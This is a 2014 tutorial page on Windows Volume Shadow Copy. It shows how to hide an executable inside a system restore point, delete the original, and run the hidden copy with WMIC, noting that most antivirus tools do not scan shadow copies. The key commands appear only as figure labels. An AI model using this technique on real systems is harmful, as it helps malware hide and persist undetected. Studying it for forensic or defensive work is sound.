Return to Data Hiding

Volume Shadow Copy Data Hiding

Tutorial Key Facts
Supported Operating SystemWindows 7 ,Vista
File System Type: NTFS
Last Update2014/07/07
AuthorNihad Hassan
Volume shadow copy (VSS) is a service available in both Windows 7 and Vista OS, it coordinates the actions that are required to create a consistent snapshot copy of the data to be backed up in a specific volume in a specific point-in-time over regular intervals. We can access this feature through the system restore functionality , which enable us to restore our system files to a previous stable state in case of sudden system failure (for example: failed software installation OR wrong uninstallation of some programs , wrong system registry modifications). Shadow copy technology works only on Volumes formatted with NTFS, and the shadow copies created could be stored on local or external networks as needed [1][2].

The snapshots created by VSS (restore points) are taken at specific time intervals, usually after installing/uninstalling new software or performing a system update, it is difficult to predict the other cases when the VSS create a snapshot, however there are some conditions for this to happen as the system should be idle for at least 10 minutes , and it should be running on AC power (if it is portable) , if the two conditions happened together we can expect to have a system restore point every two days under Windows Vista and between 7 to 8 days under Windows 7. Of course you can still create system restore points manually if you would so [3].

It is important to note that shadow copy is not an image of the entire drive, VSS operates on the block level (below file system level), VSS is tracking any changes made to all blocks on the volume, when a specific block has data written to it,VSS makes a snapshot and store it in a hidden volume (these snapshot is read only). If a specific block hasn’t changed since the last snapshot, it will not include in the current snapshot (restore point). VSS is incremental (like the incremental backup concept of databases), it will only store the modifications that happen to one file since the last snapshot.

To configure VSS service under Windows 7 we can access it from System >> Properties >> System Protection

1

 

Figure 1: Configuring restore points under Windows 7

Figure 1: Configuring restore points under Windows 7

Through the “Configure” button we can choose to activate Volume shadow service, manage allocated space and restore points for each listed volume.

This introduction is necessary to understand how VSS works, now we can explore the VSS snapshots potential in hiding data or other malicious software.

We can administer VSS thorough using the VSSadmin utility that comes with both Vista and Win 7 OS, lunch a DOS command and type (VSSadmin) to view command switches, type (VSSadmin list volumes) to list all available NTFS volumes on your system eligible for shadow copies.

The command (VSSadmin list shadowstorage) enable us to see the shadows and disk usage of our system’s volumes, in my case I have only the c: volume with has VSS enabled[4].

Figure 2: Listing volumes with shadow copy enabled

Figure 2: Listing volumes with shadow copy enabled

Lists all existing shadow copies of a specified volume with (VSSadmin list shadows /for=c:) , here Iam listing for volume c: only , if we use the command (VSSadmin list shadows) without parameters , it will list all volumes shadows on our PC.

Figure 3: Screen of shadow copies available on drive C: showing only the last restore point which carry the number 6

Figure 3: Screen of shadow copies available on drive C: showing only the last restore point which carry the number 6

Here Iam showing the last achieved copy of my system snapshots, my c: volume has 6 snapshots (restore points) and this one is the last created one.

Now we are ready to explain how we can hide our data or a malware inside one of our available restore points. Let us create a new folder on our c: volume and name it TestShadow ,I will copy an executable file inside this folder (any kind of files is OK).

Figure 4: Creating new directory on C:TestShadow and storing mspass.exe inside it

Figure 4: Creating new directory on C:TestShadow and storing mspass.exe inside it

I have only one file inside my c:TestShadow folder (mspass.exe), now I want to hide this file in one of my VSS snapshots, so I need to create a new restore point to save my newly created file. Go to Control Panel >> System >> System Protection >> System Protection Tab >> click the “Create”.  A new window appears asking you to enter a name for your restore point; I call it “DarknessGateRestorePoint” and click “Create”

 

Figure 5: Create new restore point under Windows 7

9

8

Figure 5: Create new restore point under Windows 7

Now I run (VSSadmin list shadows) command to check that a new restore point has been created.

Figure 6: New restore point successfully created

Figure 6: New restore point successfully created

As we note from Figure 6, a new restore point created, now I have 7 restore points in my system.

Let us return to our folder c:TestShadow , we need to delete the executable mspass.exe from it .

Now my file mspass.exe has been deleted from my computer, however it is still in my newly created restore point which carry the name (?GLOBALROOTDeviceHarddiskVolumeShadowCopy7), to access mspass.exe inside my restore point, I need to create a symbolic link and save it in a separate folder (RetrievedFiles) in my current working directory as follow:

12

We use DIR command to see the new symbolic link inside our working directory

Figure 7: Create a Symbolic link and point it to my last restore point

Figure 7: Create a Symbolic link and point it to my last restore point

We can access to our retrieved volume copy contents either directly through explorer or by accessing it through DOS , inside our volume copy if we browse to TestShadow folder we can see our file mspass.exe inside it.

14

Figure 8: Accessing mspass.exe inside our last restore point

Figure 8: Accessing mspass.exe inside our last restore point

After confirming that our hidden file is still there inside our newly created restore point, we can delete the symbolic link pointing back to our volume copy and tries to execute the hidden program using WMIC command.

Figure 9: Executing mspass.exe from inside last created system snapshot

Figure 9: Executing mspass.exe from inside last created system snapshot

After executing the above command, our hidden file mspass.exe is pop up on the screen confirming that our work was correct!

We note from Figure 9 that we have changed the (?) sign at the beginning of Volume shadow name with a period (.), WMIC require a period to work.

In summary, we found that we can hide data inside system restore points, if these data is executable application we can run it using the WMIC command without creating any symbolic links , most anti-virus software do not scan volume shadow copies for malware and other security threats , it is important to remember that volume shadow copies are limited in space and time , if you store large files inside it , system needs to delete the old restore points to give room for newly created one , however , if your files was small and you are a regular PC user , a restore point may last for at least 5 months under Windows 7 and this is more than enough for a hacker to perform evil actions against your PC.

[important]

On The Web:

[1]Wikipedia website <online>. Shadow Copy. Available at: https://en.wikipedia.org/wiki/Shadow_Copy [Accessed 2014/03/26].

[2]Microsoft TechNet <online>. Volume Shadow Copy Service. Available at: http://technet.microsoft.com/en-us/library/ee923636.aspx Accessed 2014/03/26].

[3]What you should know about Volume Shadow Copy/System Restore in Windows 7 & Vista (FAQ) .Available at: http://blog.szynalski.com/2009/11/23/volume-shadow-copy-system-restore/[Accessed 2014/03/27].

[4]Michael Raggo , Chet Hosmer (2013). Data Hiding: Exposing Concealed Data in Multimedia, Operating Systems, Mobile Devices and Network Protocols . Chapter 7. USA. Syngress.

[/important]

Permanent link to this article: http://www.darknessgate.com/security-tutorials/date-hiding/volume-shadow-copy-data-hiding/